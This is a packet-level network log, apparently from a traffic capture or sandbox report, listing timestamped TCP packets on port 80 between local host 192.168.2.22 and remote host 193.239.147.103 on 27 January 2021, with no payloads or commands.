Jan 27, 2021 19:29:37.974841118 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974867105 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974870920 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974905014 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974941969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974950075 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974987984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975016117 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975030899 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975066900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975102901 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975105047 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975142002 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975167036 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975177050 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975214005 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975250959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975254059 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975296974 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975316048 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975338936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975374937 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975411892 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975411892 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975447893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975471020 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975482941 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975521088 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975558043 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975564957 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.975605011 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.975610018 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023121119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023185015 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023215055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023252010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023288965 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023325920 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023360014 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023375988 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023396969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023447990 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023478031 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023487091 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023494959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023538113 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023567915 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023575068 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023613930 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023639917 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023650885 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023685932 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023719072 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023724079 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023761988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023787022 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023807049 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023849010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023880005 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023884058 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023921967 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023942947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.023957968 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.023993015 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024030924 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024032116 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024068117 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024096012 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024113894 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024154902 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024180889 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024190903 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024228096 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024256945 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024264097 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024300098 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024336100 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024352074 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024373055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024385929 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024420023 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024461031 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024480104 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024497032 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024533987 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024559975 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024569988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024605036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024632931 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024641991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024677992 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024703026 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024724007 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024739981 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024765015 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024768114 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024801016 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024838924 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024858952 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024874926 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024910927 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.024936914 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.024946928 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.025017023 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072001934 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072062016 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072102070 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072139978 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072164059 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072179079 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072212934 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072216988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072257042 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072280884 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072294950 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072343111 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072359085 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072386026 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072422981 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072446108 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072460890 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072499990 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072535038 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072535992 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072573900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072608948 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072612047 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072659016 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072696924 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072701931 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072740078 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072778940 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072783947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072817087 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072844028 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072854042 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072892904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072920084 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.072932005 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072981119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.072994947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073041916 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073079109 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073127031 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073134899 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073170900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073206902 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073209047 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073250055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073287010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073292971 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073328018 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073367119 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073367119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073438883 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073451042 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073478937 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073527098 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073543072 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073570967 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073611021 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073647976 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073662996 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073685884 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073721886 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073760033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073762894 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073796988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073811054 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073846102 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073863029 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073889017 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073926926 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.073973894 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.073996067 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074035883 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074073076 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074105024 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074110985 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074136972 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074147940 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074193954 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074222088 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074234962 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074270964 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074307919 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074335098 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074343920 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074381113 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074415922 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074419022 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074456930 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074492931 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074502945 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074547052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074574947 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074610949 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074649096 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074695110 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074713945 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074738979 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074760914 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074776888 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074815035 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074850082 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074851036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074888945 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074925900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074947119 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.074963093 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.074975014 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075011969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075054884 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075090885 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075125933 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075128078 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075165033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075170040 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075202942 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075238943 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075243950 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075277090 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075320959 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075323105 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075364113 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075400114 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075411081 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075437069 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075474977 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075478077 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075510979 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075547934 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075551033 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075584888 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075632095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075635910 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075674057 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075697899 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075711012 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075748920 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075773954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075786114 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075823069 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075849056 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075860977 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075897932 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.075938940 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.075943947 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.076024055 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124370098 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124449968 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124491930 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124528885 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124532938 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124566078 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124581099 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124603987 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124640942 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124655008 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124679089 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124716043 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124735117 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124763012 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124804020 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124819994 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124845028 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124881983 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124902964 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124917984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124955893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.124968052 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.124994993 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125034094 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125045061 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125088930 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125145912 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125197887 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125247002 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125288010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125300884 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125325918 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125363111 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125380993 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125428915 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125468016 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125482082 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125503063 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125539064 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125555038 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125575066 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125621080 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125633955 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125662088 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125698090 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125716925 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125735998 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125773907 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125787973 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125808954 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125847101 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125870943 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125883102 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125927925 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.125932932 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.125968933 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126004934 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126027107 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126044989 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126082897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126100063 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126121044 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126158953 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126177073 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126198053 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126245975 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126260996 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126288891 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126324892 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126338959 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126363993 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126401901 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126413107 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126439095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126476049 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126487017 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126512051 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126558065 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126563072 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126600027 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126614094 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126637936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126674891 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126688957 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126710892 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126745939 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126758099 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126784086 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126820087 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126832962 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126868010 CET	80	49168	193.239.147.103	192.168.2.22
